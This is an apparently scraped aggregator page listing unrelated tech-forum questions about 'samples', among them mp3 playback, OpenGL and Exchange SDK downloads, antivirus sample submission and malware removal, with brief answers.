
How to Report Malware or False Positives to Multiple Antivirus Vendors
 

Read other 9 answers
RELEVANCY SCORE 40.8

Hi!

I'm looking for some samples how to write an IRC client in C#.
Have someone any samples?

thx!
 

Read other answers
RELEVANCY SCORE 40.8

I go to a legal site that has mp3 samples... when I click on one it opens a new
page and say's page cannot be displayed.. I have a new pc, and I do have
media player set to play mp3's. I believe on my old pc the same thing
happened until I changed a setting. In IE6 settings I do have play
multimedia checked and allow active content... when I click on the link
media player should open and play, it does on my older pc ??? If I copy the
shortcut and paste it into media player that works, so I know the link is
good. So what am I missing ? I also tried a link on one of my sites that plays wmv files, also associated with media player and I have the same problem
Joel
 

A:playing mp3 samples from websites

Post the links.
 

Read other 3 answers
RELEVANCY SCORE 40.8

It might look as trivial question .. but sorry I am very desperate

I am trying to create my own collection of malware and benign applications and analyse them with Anubis .. I've already managed to collect large number of malware but I am in need for more benign applications with these specific features:
- work on windows XP
- smaller than 8 MB
- EXE files only

I have downloaded clean windows on Virtual machines and collect all the clean files, and I have downloaded from legitimate websites but it doesn't seem enough at all
Any recommendation of sources ?
 

Read other answers
RELEVANCY SCORE 40.8

Itunes will not play certain samples, it seems that it's usually the songs that I have searched for in the search bar. After I have searched for it and it doesn't work, I try clicking on the artist through the main page and accessing the song there, but it still won't play. It stays on 0:00. I have tried restarting itunes, restarting the computer, and updating itunes. I'm not sure what else will work!!

A:Itunes will not play certain 30 sec/1:30 samples

Have you tried playing the songs in a different Media Player?

Also, try re-installing Itunes.

Read other 2 answers
RELEVANCY SCORE 40.8

Dear Users,
I am in need of a large amount of password protected PDFs (say 1000), so that I may tally the most commonly used passwords.
Does anyone know where I could find such a thing?
Any help would be much appreciated,
Thanks.

A:Password-protected PDF Samples

How would this allow you to tally commonly used passwords?
 
There are plenty of reports online regarding commonly used passwords.

Read other 11 answers
RELEVANCY SCORE 40.8

Hiya

OpenGL I: Quick Start Sample

This article describes GLEasy, a simple OpenGL program. OpenGL is a three-dimensional (3-D) graphics library included with the Microsoft? Windows NT? version 3.5 operating system. GLEasy is a Microsoft Foundation Class Library (MFC) application that provides a good starting point for investigations into the Windows NT implementation of OpenGL.

http://www.microsoft.com/downloads/release.asp?ReleaseID=44238&area=search&ordinal=25
GLEasy Sample

This article describes GLEasy, a simple OpenGL program. OpenGL is a three-dimensional (3-D) graphics library included with the Microsoft? Windows NT? version 3.5 operating system. GLEasy is a Microsoft Foundation Class Library (MFC) application that provides a good starting point for investigations into the Windows NT implementation of OpenGL.

http://www.microsoft.com/downloads/release.asp?ReleaseID=44239&area=search&ordinal=24

GLPal sample

If a program written for the Microsoft Windows operating system needs more than 16 colors and is running on an 8-bits-per-pixel (bpp) display adapter, the program must create and use a palette. OpenGL programs running on Windows NT or (eventually) Windows 95 are no exception.

http://www.microsoft.com/downloads/release.asp?ReleaseID=44240&area=search&ordinal=23

Easy GL Sample

If a program written for the Microsoft Windows operating system needs more than 16 colors and is running on an 8-bits-per-pixel (bpp) display adapter, the... Read more

Read other answers
RELEVANCY SCORE 40.8

Anyone have a workaround? anytime I try to via their webpage for it.

https://www.bitdefender.com/submit/

I can fill out everything but when I select "File" it doesn't give me the option to choose a file.

Using Bitdefender Free.
 

Read other answers
RELEVANCY SCORE 40.8

Hiya

Download the Exchange SDK Documentation and Samples and start building applications for Exchange 2000. The SDK includes new and updated documentation, sample applications and more.

System Requirements

- 16 MB disk space required to download.

Operating System - Windows 2000, Win XP
http://www.microsoft.com/downloads/release.asp?ReleaseID=42902&area=search&ordinal=3

Exchange SDK Development Tools

The Exchange SDK Development Tools provides tools and components for creating and debugging collaborative applications on Exchange.

System Requirements

- 4.5 MB Required disc space to download, install and operate

Operating System - Windows 2000
http://www.microsoft.com/downloads/release.asp?ReleaseID=42903&area=search&ordinal=2

Regards

eddie
 

Read other answers
RELEVANCY SCORE 40.8

Edit: Using XP

I've been going through The OpenGL Programming Guide (AKA the red book). All the examples are available for download from OpenGL.org(opengl.org/resources/code/basics/redbook/redbook.html). When I try to run them I get the following error.

This application has failed to start because glut.dll was not found. Re-installing the application may fix this problem.Click to expand...

After hunting down glut.dll and placing it in the folder with my examples, I get this error.

...failed to start because opengl.dll was not found...Click to expand...

After hunting down opengl.dll I get yet another error and this time google is no help.

...failed to start because HfxClasses.dll was not found...Click to expand...

I get the feeling that these all should have come together in a pack or something. I'm lost. What to do? Where do I get these mystery libraries? I can't find any info on opengl.org.
 

Read other answers
RELEVANCY SCORE 40.8

hi one and all,, i just like to know if anyone can tell me who or what the song/artist is on the video sample supplied with xp lady singing in the street people sitting around playing instements she's singing ""good times bad times give me some of that"" not sure if this is the corus please help sorry i know this isnt a tec question thanks for any help
 

A:Solved: xp video samples

Hi,

is this it?

http://www.youtube.com/watch?v=Mj6JyPXg584
 

Read other 2 answers
RELEVANCY SCORE 40.8

I can't hear the music samples for a song because it ask if I want to open the file instead of playing automatically. How can I fix this.Mod Edit: Moved topic to more appropriate forum. ~ Animal

A:Can't Hear Music Samples

Have you checked the file association in the file's properties?
Right click on the file, choose Properties.
Right under "type of file" should be "opens with." If it is NOT your media player of choice, you may change it.
Regards,
John

Read other 2 answers
RELEVANCY SCORE 40.8

Hi

I bought a new computer recently with Vista and find that when using Internet Explorer I cannot download mp3 audio samples from websites. They download OK on Firefox but with Explorer I just get a blank screen with a yellow triangle and exclamation mark and the word done at bottom left of the screen.

A:mp3 audio samples not downloading

Are pop-up's Enabled? Some time's if a pop-up try's to come up there's a little box that say's "Pop-up Blocked" if that is the problem click on the box.

Read other 1 answers
RELEVANCY SCORE 40.8

Hi, I have just submitted a sample to quihoo and I encountered a problem... While using chrome the submission wasn't successful, and the page remained there with the circle turning, I used Internet Explorer 8 and the submission was immediatly completed. Anyone else had this problem? The site I used is 360totalsecurity.com/en/suspicion
 

A:Troubles submitting samples

Try Chrome Incognito without any extensions.

If this is your host PC, it's recommended to update Internet Explorer.
 

Read other 1 answers
RELEVANCY SCORE 40.8

powershell SAMPLES commands to install EXE, MSI, bat, cmd files using UNC source locations

powershell  SAMPLES commands to install EXE, MSI, bat, cmd files using coping source files in to remote machines e.g c:windows\temp

Read other answers
RELEVANCY SCORE 40.8

Hiya

Notify Icon

Sample code associated with "Using the Microsoft® .NET Compact Framework MessageWindow class" whitepaper

System Requirements
Supported Operating Systems: Windows 2000, Windows NT, Windows XP

Visual Studio .NET 2003

http://www.microsoft.com/downloads/...c0-34a5-47d1-bb50-e5e261288ae3&DisplayLang=en

Guid Generator

Sample code associated with Guid Generator whitepaper

System Requirements
Supported Operating Systems: Windows 98, Windows ME, Windows NT, Windows Server 2003, Windows XP

Visual Studio .NET 2003

http://www.microsoft.com/downloads/...4c-14bc-409f-8537-43c711a0bf1e&DisplayLang=en

Image Button

Sample code associated with "How to create a Microsoft® .NET Compact Framework-based Image Button" whitepaper

System Requirements
Supported Operating Systems: Windows 2000, Windows NT, Windows Server 2003, Windows XP

Visual Studio .NET 2003

http://www.microsoft.com/downloads/...13-2da5-42c7-9426-b1f298752b4e&DisplayLang=en

Send SMS

Sample code associated with "Sending SMS's from Microsoft® .NET Compact Framework-based Applications" whitepaper

System Requirements
Supported Operating Systems: Windows 2000, Windows NT, Windows Server 2003, Windows XP

Visual Studio .NET 2003

http://www.microsoft.com/downloads/...f9-704a-41e6-9b06-04a278125bbe&DisplayLang=en

Animation Control

Sample code associated with Animation Control whitepaper

System Requirements
Supported Operating Systems: Windows 2000, ... Read more

Read other answers
RELEVANCY SCORE 40.8

Hi,

I was wondering if anyone knew of a website that allows you to listen to alternative rock sound samples. Creed, nickel back, etc... I tried amazon but it hard to navigate. I want like the top 100 alt. rock songs in the us or something like that. My intention is to find some I like to use at kazaalite....

Thanks,
Alana
 

A:(Resolved) Song samples??

Read other 6 answers
RELEVANCY SCORE 40.8

Hi Guys,Please help me how to get the fake alert samples.Edit: Moved topic from Virus, Trojan, Spyware, and Malware Removal Logs to the more appropriate forum. ~ Animal

A:Fake alert samples

Bleeping Computer's main mission is to help people rid their computers of malware not infect them. For legal and liability purposes we do not endorse or permit the sharing of malware samples via the forums. There are plenty of 'in the wild' samples available by using unsafe browsing tactics.

By posting samples they may be taken and used for nefarious purposes. Which would defeat the main purpose of Bleeping Computer.

Read other 2 answers
RELEVANCY SCORE 40.8

I run windows 7 home premium 64-bit.My problem started about two days ago. I got a bunch of viruses when I clicked a bad link. I was alerted to them by Symantec anti-virusImmediately after I got infected I started hearing advertisements and weird noises without any apparent program running them. That stopped after a quick virus scan with Symantec.Windows defender became deactivated. When I try to turn it back on I get the message: ?This program is turned off. If you are using another program that checks for harmful or unwanted software, use the action center to check that program?s status. If you would like to use this program, click here to turn it on.?When I click on it I get the following message: ?This program is blocked by group policy. For more information, contact your system administrator. (Error Code: 0x800704ec)?After Symantec found and removed several piece of malware, I searched google for things that I should do. I downloaded Avira, Malabytes? anti-malware, and Kaspersky anti-virus. I did separate scans with all of them until I found out that you are not supposed to have multiple anti-virus programs installed so I uninstalled Avira. When I try to uninstall the trial version of kaspersky anti-virus 2010 (because I just found out you?re not supposed to have more than one anti-virus program installed at once) it works until it gets to ?deleting utilities.? Then I get the message: ?Error 1922.Service Kaspersky Anti-Virus (AVP) could not be deleted. Verify that you h... Read more

A:Trojans,spyware,malware, I'm not sure but I have a lot of it! I clicked a bad link!

Just remembered:When I initially got the virus I also stared getting ads and fake warnings from Paladin Antivirus but I don't get those anymore.

Read other 24 answers
RELEVANCY SCORE 40.8

So yesterday I found out a new section in the My Computer folder called Network Location. Underneath there was a link called "my websites on msn" linking to msnusers.com. Is there another MS crappy update or is a malware? (I've scanned the website with Identify websites involved in malware incidents, fraudulent and spamming activities and it turned out in one of the 25 sources that the website might contain malware). If so, how can I remove it?

Read other answers